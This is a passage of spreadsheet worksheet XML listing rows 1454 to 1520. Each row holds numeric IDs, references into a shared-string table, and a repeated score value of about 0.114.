        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="1454" ht="15.75" customHeight="1">
      <c r="A1454" s="1">
        <v>5641.0</v>
      </c>
      <c r="B1454" s="2">
        <v>4.6261215E7</v>
      </c>
      <c r="C1454" s="2" t="s">
        <v>1316</v>
      </c>
      <c r="D1454" s="2">
        <v>1.0</v>
      </c>
      <c r="E1454" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1454" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="1455" ht="15.75" customHeight="1">
      <c r="A1455" s="1">
        <v>5836.0</v>
      </c>
      <c r="B1455" s="2">
        <v>4.6905201E7</v>
      </c>
      <c r="C1455" s="2" t="s">
        <v>1317</v>
      </c>
      <c r="D1455" s="2">
        <v>1.0</v>
      </c>
      <c r="E1455" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1455" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="1456" ht="15.75" customHeight="1">
      <c r="A1456" s="1">
        <v>6320.0</v>
      </c>
      <c r="B1456" s="2">
        <v>4.826454E7</v>
      </c>
      <c r="C1456" s="2" t="s">
        <v>1318</v>
      </c>
      <c r="D1456" s="2">
        <v>1.0</v>
      </c>
      <c r="E1456" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1456" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="1457" ht="15.75" customHeight="1">
      <c r="A1457" s="1">
        <v>8013.0</v>
      </c>
      <c r="B1457" s="2">
        <v>5.2786827E7</v>
      </c>
      <c r="C1457" s="2" t="s">
        <v>1319</v>
      </c>
      <c r="D1457" s="2">
        <v>1.0</v>
      </c>
      <c r="E1457" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1457" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="1458" ht="15.75" customHeight="1">
      <c r="A1458" s="1">
        <v>8162.0</v>
      </c>
      <c r="B1458" s="2">
        <v>5.3208246E7</v>
      </c>
      <c r="C1458" s="2" t="s">
        <v>1320</v>
      </c>
      <c r="D1458" s="2">
        <v>1.0</v>
      </c>
      <c r="E1458" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1458" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="1459" ht="15.75" customHeight="1">
      <c r="A1459" s="1">
        <v>8383.0</v>
      </c>
      <c r="B1459" s="2">
        <v>5.3825477E7</v>
      </c>
      <c r="C1459" s="2" t="s">
        <v>1321</v>
      </c>
      <c r="D1459" s="2">
        <v>1.0</v>
      </c>
      <c r="E1459" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1459" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="1460" ht="15.75" customHeight="1">
      <c r="A1460" s="1">
        <v>8930.0</v>
      </c>
      <c r="B1460" s="2">
        <v>5.4846767E7</v>
      </c>
      <c r="C1460" s="2" t="s">
        <v>1322</v>
      </c>
      <c r="D1460" s="2">
        <v>1.0</v>
      </c>
      <c r="E1460" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1460" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="1461" ht="15.75" customHeight="1">
      <c r="A1461" s="1">
        <v>9616.0</v>
      </c>
      <c r="B1461" s="2">
        <v>5.6188312E7</v>
      </c>
      <c r="C1461" s="2" t="s">
        <v>1323</v>
      </c>
      <c r="D1461" s="2">
        <v>1.0</v>
      </c>
      <c r="E1461" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1461" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="1462" ht="15.75" customHeight="1">
      <c r="A1462" s="1">
        <v>10940.0</v>
      </c>
      <c r="B1462" s="2">
        <v>1.700619E7</v>
      </c>
      <c r="C1462" s="2" t="s">
        <v>1324</v>
      </c>
      <c r="D1462" s="2">
        <v>1.0</v>
      </c>
      <c r="E1462" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1462" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="1463" ht="15.75" customHeight="1">
      <c r="A1463" s="1">
        <v>11155.0</v>
      </c>
      <c r="B1463" s="2">
        <v>1.9444352E7</v>
      </c>
      <c r="C1463" s="2" t="s">
        <v>1325</v>
      </c>
      <c r="D1463" s="2">
        <v>1.0</v>
      </c>
      <c r="E1463" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1463" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="1464" ht="15.75" customHeight="1">
      <c r="A1464" s="1">
        <v>11426.0</v>
      </c>
      <c r="B1464" s="2">
        <v>2.1739149E7</v>
      </c>
      <c r="C1464" s="2" t="s">
        <v>1326</v>
      </c>
      <c r="D1464" s="2">
        <v>1.0</v>
      </c>
      <c r="E1464" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1464" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="1465" ht="15.75" customHeight="1">
      <c r="A1465" s="1">
        <v>11592.0</v>
      </c>
      <c r="B1465" s="2">
        <v>2.2892317E7</v>
      </c>
      <c r="C1465" s="2" t="s">
        <v>1327</v>
      </c>
      <c r="D1465" s="2">
        <v>1.0</v>
      </c>
      <c r="E1465" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1465" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="1466" ht="15.75" customHeight="1">
      <c r="A1466" s="1">
        <v>12054.0</v>
      </c>
      <c r="B1466" s="2">
        <v>2.6420861E7</v>
      </c>
      <c r="C1466" s="2" t="s">
        <v>1328</v>
      </c>
      <c r="D1466" s="2">
        <v>1.0</v>
      </c>
      <c r="E1466" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1466" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="1467" ht="15.75" customHeight="1">
      <c r="A1467" s="1">
        <v>12831.0</v>
      </c>
      <c r="B1467" s="2">
        <v>3.1646972E7</v>
      </c>
      <c r="C1467" s="2" t="s">
        <v>1329</v>
      </c>
      <c r="D1467" s="2">
        <v>1.0</v>
      </c>
      <c r="E1467" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1467" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="1468" ht="15.75" customHeight="1">
      <c r="A1468" s="1">
        <v>13044.0</v>
      </c>
      <c r="B1468" s="2">
        <v>3.3096343E7</v>
      </c>
      <c r="C1468" s="2" t="s">
        <v>1330</v>
      </c>
      <c r="D1468" s="2">
        <v>1.0</v>
      </c>
      <c r="E1468" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1468" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="1469" ht="15.75" customHeight="1">
      <c r="A1469" s="1">
        <v>13164.0</v>
      </c>
      <c r="B1469" s="2">
        <v>3.3949202E7</v>
      </c>
      <c r="C1469" s="2" t="s">
        <v>1331</v>
      </c>
      <c r="D1469" s="2">
        <v>1.0</v>
      </c>
      <c r="E1469" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1469" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="1470" ht="15.75" customHeight="1">
      <c r="A1470" s="1">
        <v>13755.0</v>
      </c>
      <c r="B1470" s="2">
        <v>3.649397E7</v>
      </c>
      <c r="C1470" s="2" t="s">
        <v>1332</v>
      </c>
      <c r="D1470" s="2">
        <v>1.0</v>
      </c>
      <c r="E1470" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1470" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="1471" ht="15.75" customHeight="1">
      <c r="A1471" s="1">
        <v>14163.0</v>
      </c>
      <c r="B1471" s="2">
        <v>3.8025053E7</v>
      </c>
      <c r="C1471" s="2" t="s">
        <v>1333</v>
      </c>
      <c r="D1471" s="2">
        <v>1.0</v>
      </c>
      <c r="E1471" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1471" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="1472" ht="15.75" customHeight="1">
      <c r="A1472" s="1">
        <v>14573.0</v>
      </c>
      <c r="B1472" s="2">
        <v>4.0077791E7</v>
      </c>
      <c r="C1472" s="2" t="s">
        <v>1334</v>
      </c>
      <c r="D1472" s="2">
        <v>1.0</v>
      </c>
      <c r="E1472" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1472" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="1473" ht="15.75" customHeight="1">
      <c r="A1473" s="1">
        <v>14771.0</v>
      </c>
      <c r="B1473" s="2">
        <v>4.0861512E7</v>
      </c>
      <c r="C1473" s="2" t="s">
        <v>1335</v>
      </c>
      <c r="D1473" s="2">
        <v>1.0</v>
      </c>
      <c r="E1473" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1473" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="1474" ht="15.75" customHeight="1">
      <c r="A1474" s="1">
        <v>15179.0</v>
      </c>
      <c r="B1474" s="2">
        <v>4.2022395E7</v>
      </c>
      <c r="C1474" s="2" t="s">
        <v>1336</v>
      </c>
      <c r="D1474" s="2">
        <v>1.0</v>
      </c>
      <c r="E1474" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1474" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="1475" ht="15.75" customHeight="1">
      <c r="A1475" s="1">
        <v>15575.0</v>
      </c>
      <c r="B1475" s="2">
        <v>4.3439333E7</v>
      </c>
      <c r="C1475" s="2" t="s">
        <v>1337</v>
      </c>
      <c r="D1475" s="2">
        <v>1.0</v>
      </c>
      <c r="E1475" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1475" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="1476" ht="15.75" customHeight="1">
      <c r="A1476" s="1">
        <v>15943.0</v>
      </c>
      <c r="B1476" s="2">
        <v>4.4750077E7</v>
      </c>
      <c r="C1476" s="2" t="s">
        <v>1338</v>
      </c>
      <c r="D1476" s="2">
        <v>1.0</v>
      </c>
      <c r="E1476" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1476" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="1477" ht="15.75" customHeight="1">
      <c r="A1477" s="1">
        <v>16073.0</v>
      </c>
      <c r="B1477" s="2">
        <v>4.5327034E7</v>
      </c>
      <c r="C1477" s="2" t="s">
        <v>1339</v>
      </c>
      <c r="D1477" s="2">
        <v>1.0</v>
      </c>
      <c r="E1477" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1477" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="1478" ht="15.75" customHeight="1">
      <c r="A1478" s="1">
        <v>16136.0</v>
      </c>
      <c r="B1478" s="2">
        <v>4.5538337E7</v>
      </c>
      <c r="C1478" s="2" t="s">
        <v>1340</v>
      </c>
      <c r="D1478" s="2">
        <v>1.0</v>
      </c>
      <c r="E1478" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1478" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="1479" ht="15.75" customHeight="1">
      <c r="A1479" s="1">
        <v>16272.0</v>
      </c>
      <c r="B1479" s="2">
        <v>4.5782397E7</v>
      </c>
      <c r="C1479" s="2" t="s">
        <v>1341</v>
      </c>
      <c r="D1479" s="2">
        <v>1.0</v>
      </c>
      <c r="E1479" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1479" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="1480" ht="15.75" customHeight="1">
      <c r="A1480" s="1">
        <v>16398.0</v>
      </c>
      <c r="B1480" s="2">
        <v>4.6286023E7</v>
      </c>
      <c r="C1480" s="2" t="s">
        <v>1342</v>
      </c>
      <c r="D1480" s="2">
        <v>1.0</v>
      </c>
      <c r="E1480" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1480" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="1481" ht="15.75" customHeight="1">
      <c r="A1481" s="1">
        <v>16838.0</v>
      </c>
      <c r="B1481" s="2">
        <v>4.7900017E7</v>
      </c>
      <c r="C1481" s="2" t="s">
        <v>1343</v>
      </c>
      <c r="D1481" s="2">
        <v>1.0</v>
      </c>
      <c r="E1481" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1481" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="1482" ht="15.75" customHeight="1">
      <c r="A1482" s="1">
        <v>16888.0</v>
      </c>
      <c r="B1482" s="2">
        <v>4.8017334E7</v>
      </c>
      <c r="C1482" s="2" t="s">
        <v>1344</v>
      </c>
      <c r="D1482" s="2">
        <v>1.0</v>
      </c>
      <c r="E1482" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1482" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="1483" ht="15.75" customHeight="1">
      <c r="A1483" s="1">
        <v>16969.0</v>
      </c>
      <c r="B1483" s="2">
        <v>4.8293252E7</v>
      </c>
      <c r="C1483" s="2" t="s">
        <v>1345</v>
      </c>
      <c r="D1483" s="2">
        <v>1.0</v>
      </c>
      <c r="E1483" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1483" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="1484" ht="15.75" customHeight="1">
      <c r="A1484" s="1">
        <v>17173.0</v>
      </c>
      <c r="B1484" s="2">
        <v>4.8892799E7</v>
      </c>
      <c r="C1484" s="2" t="s">
        <v>1346</v>
      </c>
      <c r="D1484" s="2">
        <v>1.0</v>
      </c>
      <c r="E1484" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1484" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="1485" ht="15.75" customHeight="1">
      <c r="A1485" s="1">
        <v>17486.0</v>
      </c>
      <c r="B1485" s="2">
        <v>4.9952696E7</v>
      </c>
      <c r="C1485" s="2" t="s">
        <v>1347</v>
      </c>
      <c r="D1485" s="2">
        <v>1.0</v>
      </c>
      <c r="E1485" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1485" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="1486" ht="15.75" customHeight="1">
      <c r="A1486" s="1">
        <v>17526.0</v>
      </c>
      <c r="B1486" s="2">
        <v>5.0097256E7</v>
      </c>
      <c r="C1486" s="2" t="s">
        <v>1348</v>
      </c>
      <c r="D1486" s="2">
        <v>1.0</v>
      </c>
      <c r="E1486" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1486" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="1487" ht="15.75" customHeight="1">
      <c r="A1487" s="1">
        <v>17921.0</v>
      </c>
      <c r="B1487" s="2">
        <v>5.1158973E7</v>
      </c>
      <c r="C1487" s="2" t="s">
        <v>1349</v>
      </c>
      <c r="D1487" s="2">
        <v>1.0</v>
      </c>
      <c r="E1487" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1487" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="1488" ht="15.75" customHeight="1">
      <c r="A1488" s="1">
        <v>18765.0</v>
      </c>
      <c r="B1488" s="2">
        <v>5.3789958E7</v>
      </c>
      <c r="C1488" s="2" t="s">
        <v>1350</v>
      </c>
      <c r="D1488" s="2">
        <v>1.0</v>
      </c>
      <c r="E1488" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1488" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="1489" ht="15.75" customHeight="1">
      <c r="A1489" s="1">
        <v>18911.0</v>
      </c>
      <c r="B1489" s="2">
        <v>5.4197445E7</v>
      </c>
      <c r="C1489" s="2" t="s">
        <v>1351</v>
      </c>
      <c r="D1489" s="2">
        <v>1.0</v>
      </c>
      <c r="E1489" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1489" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="1490" ht="15.75" customHeight="1">
      <c r="A1490" s="1">
        <v>19169.0</v>
      </c>
      <c r="B1490" s="2">
        <v>5.4944623E7</v>
      </c>
      <c r="C1490" s="2" t="s">
        <v>1352</v>
      </c>
      <c r="D1490" s="2">
        <v>1.0</v>
      </c>
      <c r="E1490" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1490" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="1491" ht="15.75" customHeight="1">
      <c r="A1491" s="1">
        <v>19438.0</v>
      </c>
      <c r="B1491" s="2">
        <v>5.5702898E7</v>
      </c>
      <c r="C1491" s="2" t="s">
        <v>1353</v>
      </c>
      <c r="D1491" s="2">
        <v>1.0</v>
      </c>
      <c r="E1491" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1491" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="1492" ht="15.75" customHeight="1">
      <c r="A1492" s="1">
        <v>19679.0</v>
      </c>
      <c r="B1492" s="2">
        <v>5.6432101E7</v>
      </c>
      <c r="C1492" s="2" t="s">
        <v>1354</v>
      </c>
      <c r="D1492" s="2">
        <v>1.0</v>
      </c>
      <c r="E1492" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1492" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="1493" ht="15.75" customHeight="1">
      <c r="A1493" s="1">
        <v>20047.0</v>
      </c>
      <c r="B1493" s="2">
        <v>7946275.0</v>
      </c>
      <c r="C1493" s="2" t="s">
        <v>1355</v>
      </c>
      <c r="D1493" s="2">
        <v>1.0</v>
      </c>
      <c r="E1493" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1493" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="1494" ht="15.75" customHeight="1">
      <c r="A1494" s="1">
        <v>20291.0</v>
      </c>
      <c r="B1494" s="2">
        <v>1.1218859E7</v>
      </c>
      <c r="C1494" s="2" t="s">
        <v>1356</v>
      </c>
      <c r="D1494" s="2">
        <v>1.0</v>
      </c>
      <c r="E1494" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1494" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="1495" ht="15.75" customHeight="1">
      <c r="A1495" s="1">
        <v>20334.0</v>
      </c>
      <c r="B1495" s="2">
        <v>1.1531034E7</v>
      </c>
      <c r="C1495" s="2" t="s">
        <v>1357</v>
      </c>
      <c r="D1495" s="2">
        <v>1.0</v>
      </c>
      <c r="E1495" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1495" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="1496" ht="15.75" customHeight="1">
      <c r="A1496" s="1">
        <v>20345.0</v>
      </c>
      <c r="B1496" s="2">
        <v>1.1629142E7</v>
      </c>
      <c r="C1496" s="2" t="s">
        <v>1358</v>
      </c>
      <c r="D1496" s="2">
        <v>1.0</v>
      </c>
      <c r="E1496" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1496" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="1497" ht="15.75" customHeight="1">
      <c r="A1497" s="1">
        <v>20749.0</v>
      </c>
      <c r="B1497" s="2">
        <v>1.4814868E7</v>
      </c>
      <c r="C1497" s="2" t="s">
        <v>1359</v>
      </c>
      <c r="D1497" s="2">
        <v>1.0</v>
      </c>
      <c r="E1497" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1497" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="1498" ht="15.75" customHeight="1">
      <c r="A1498" s="1">
        <v>20806.0</v>
      </c>
      <c r="B1498" s="2">
        <v>1.5305186E7</v>
      </c>
      <c r="C1498" s="2" t="s">
        <v>1360</v>
      </c>
      <c r="D1498" s="2">
        <v>1.0</v>
      </c>
      <c r="E1498" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1498" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="1499" ht="15.75" customHeight="1">
      <c r="A1499" s="1">
        <v>20848.0</v>
      </c>
      <c r="B1499" s="2">
        <v>1.5699041E7</v>
      </c>
      <c r="C1499" s="2" t="s">
        <v>1361</v>
      </c>
      <c r="D1499" s="2">
        <v>1.0</v>
      </c>
      <c r="E1499" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1499" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="1500" ht="15.75" customHeight="1">
      <c r="A1500" s="1">
        <v>20943.0</v>
      </c>
      <c r="B1500" s="2">
        <v>1.6562912E7</v>
      </c>
      <c r="C1500" s="2" t="s">
        <v>1362</v>
      </c>
      <c r="D1500" s="2">
        <v>1.0</v>
      </c>
      <c r="E1500" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1500" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="1501" ht="15.75" customHeight="1">
      <c r="A1501" s="1">
        <v>20946.0</v>
      </c>
      <c r="B1501" s="2">
        <v>1.6594889E7</v>
      </c>
      <c r="C1501" s="2" t="s">
        <v>1363</v>
      </c>
      <c r="D1501" s="2">
        <v>1.0</v>
      </c>
      <c r="E1501" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1501" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="1502" ht="15.75" customHeight="1">
      <c r="A1502" s="1">
        <v>21054.0</v>
      </c>
      <c r="B1502" s="2">
        <v>1.7766605E7</v>
      </c>
      <c r="C1502" s="2" t="s">
        <v>1364</v>
      </c>
      <c r="D1502" s="2">
        <v>1.0</v>
      </c>
      <c r="E1502" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1502" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="1503" ht="15.75" customHeight="1">
      <c r="A1503" s="1">
        <v>21107.0</v>
      </c>
      <c r="B1503" s="2">
        <v>1.8182204E7</v>
      </c>
      <c r="C1503" s="2" t="s">
        <v>1365</v>
      </c>
      <c r="D1503" s="2">
        <v>1.0</v>
      </c>
      <c r="E1503" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1503" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="1504" ht="15.75" customHeight="1">
      <c r="A1504" s="1">
        <v>21163.0</v>
      </c>
      <c r="B1504" s="2">
        <v>1.8975345E7</v>
      </c>
      <c r="C1504" s="2" t="s">
        <v>1366</v>
      </c>
      <c r="D1504" s="2">
        <v>1.0</v>
      </c>
      <c r="E1504" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1504" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="1505" ht="15.75" customHeight="1">
      <c r="A1505" s="1">
        <v>21229.0</v>
      </c>
      <c r="B1505" s="2">
        <v>1.9649312E7</v>
      </c>
      <c r="C1505" s="2" t="s">
        <v>1367</v>
      </c>
      <c r="D1505" s="2">
        <v>1.0</v>
      </c>
      <c r="E1505" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1505" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="1506" ht="15.75" customHeight="1">
      <c r="A1506" s="1">
        <v>21982.0</v>
      </c>
      <c r="B1506" s="2">
        <v>2.9395074E7</v>
      </c>
      <c r="C1506" s="2" t="s">
        <v>1367</v>
      </c>
      <c r="D1506" s="2">
        <v>1.0</v>
      </c>
      <c r="E1506" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1506" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="1507" ht="15.75" customHeight="1">
      <c r="A1507" s="1">
        <v>22146.0</v>
      </c>
      <c r="B1507" s="2">
        <v>3.1262737E7</v>
      </c>
      <c r="C1507" s="2" t="s">
        <v>1368</v>
      </c>
      <c r="D1507" s="2">
        <v>1.0</v>
      </c>
      <c r="E1507" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1507" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="1508" ht="15.75" customHeight="1">
      <c r="A1508" s="1">
        <v>22190.0</v>
      </c>
      <c r="B1508" s="2">
        <v>3.1758612E7</v>
      </c>
      <c r="C1508" s="2" t="s">
        <v>1369</v>
      </c>
      <c r="D1508" s="2">
        <v>1.0</v>
      </c>
      <c r="E1508" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1508" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="1509" ht="15.75" customHeight="1">
      <c r="A1509" s="1">
        <v>22219.0</v>
      </c>
      <c r="B1509" s="2">
        <v>3.2249453E7</v>
      </c>
      <c r="C1509" s="2" t="s">
        <v>1370</v>
      </c>
      <c r="D1509" s="2">
        <v>1.0</v>
      </c>
      <c r="E1509" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1509" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="1510" ht="15.75" customHeight="1">
      <c r="A1510" s="1">
        <v>22247.0</v>
      </c>
      <c r="B1510" s="2">
        <v>3.2761922E7</v>
      </c>
      <c r="C1510" s="2" t="s">
        <v>1371</v>
      </c>
      <c r="D1510" s="2">
        <v>1.0</v>
      </c>
      <c r="E1510" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1510" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="1511" ht="15.75" customHeight="1">
      <c r="A1511" s="1">
        <v>22413.0</v>
      </c>
      <c r="B1511" s="2">
        <v>3.6012622E7</v>
      </c>
      <c r="C1511" s="2" t="s">
        <v>1372</v>
      </c>
      <c r="D1511" s="2">
        <v>1.0</v>
      </c>
      <c r="E1511" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1511" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="1512" ht="15.75" customHeight="1">
      <c r="A1512" s="1">
        <v>22420.0</v>
      </c>
      <c r="B1512" s="2">
        <v>3.6087618E7</v>
      </c>
      <c r="C1512" s="2" t="s">
        <v>1373</v>
      </c>
      <c r="D1512" s="2">
        <v>1.0</v>
      </c>
      <c r="E1512" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1512" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="1513" ht="15.75" customHeight="1">
      <c r="A1513" s="1">
        <v>22653.0</v>
      </c>
      <c r="B1513" s="2">
        <v>4.1069307E7</v>
      </c>
      <c r="C1513" s="2" t="s">
        <v>1374</v>
      </c>
      <c r="D1513" s="2">
        <v>1.0</v>
      </c>
      <c r="E1513" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1513" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="1514" ht="15.75" customHeight="1">
      <c r="A1514" s="1">
        <v>22766.0</v>
      </c>
      <c r="B1514" s="2">
        <v>4.4828883E7</v>
      </c>
      <c r="C1514" s="2" t="s">
        <v>1375</v>
      </c>
      <c r="D1514" s="2">
        <v>1.0</v>
      </c>
      <c r="E1514" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1514" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="1515" ht="15.75" customHeight="1">
      <c r="A1515" s="1">
        <v>22778.0</v>
      </c>
      <c r="B1515" s="2">
        <v>4.5216854E7</v>
      </c>
      <c r="C1515" s="2" t="s">
        <v>1376</v>
      </c>
      <c r="D1515" s="2">
        <v>1.0</v>
      </c>
      <c r="E1515" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1515" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="1516" ht="15.75" customHeight="1">
      <c r="A1516" s="1">
        <v>22816.0</v>
      </c>
      <c r="B1516" s="2">
        <v>4.6177439E7</v>
      </c>
      <c r="C1516" s="2" t="s">
        <v>1377</v>
      </c>
      <c r="D1516" s="2">
        <v>1.0</v>
      </c>
      <c r="E1516" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1516" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="1517" ht="15.75" customHeight="1">
      <c r="A1517" s="1">
        <v>22835.0</v>
      </c>
      <c r="B1517" s="2">
        <v>4.6497954E7</v>
      </c>
      <c r="C1517" s="2" t="s">
        <v>1378</v>
      </c>
      <c r="D1517" s="2">
        <v>1.0</v>
      </c>
      <c r="E1517" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1517" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="1518" ht="15.75" customHeight="1">
      <c r="A1518" s="1">
        <v>22854.0</v>
      </c>
      <c r="B1518" s="2">
        <v>4.7065743E7</v>
      </c>
      <c r="C1518" s="2" t="s">
        <v>1379</v>
      </c>
      <c r="D1518" s="2">
        <v>1.0</v>
      </c>
      <c r="E1518" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1518" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="1519" ht="15.75" customHeight="1">
      <c r="A1519" s="1">
        <v>23122.0</v>
      </c>
      <c r="B1519" s="2">
        <v>5.1307195E7</v>
      </c>
      <c r="C1519" s="2" t="s">
        <v>1380</v>
      </c>
      <c r="D1519" s="2">
        <v>1.0</v>
      </c>
      <c r="E1519" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1519" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="1520" ht="15.75" customHeight="1">
      <c r="A1520" s="1">
        <v>23274.0</v>
      </c>
      <c r="B1520" s="2">
        <v>5354120.0</v>
      </c>
      <c r="C1520" s="2" t="s">
        <v>1381</v>
      </c>
      <c r="D1520" s="2">
        <v>1.0</v>
      </c>
      <c r="E1520" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1520" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="1521" ht="15.75" customHeight="1">
      <c r="A1521" s="1">
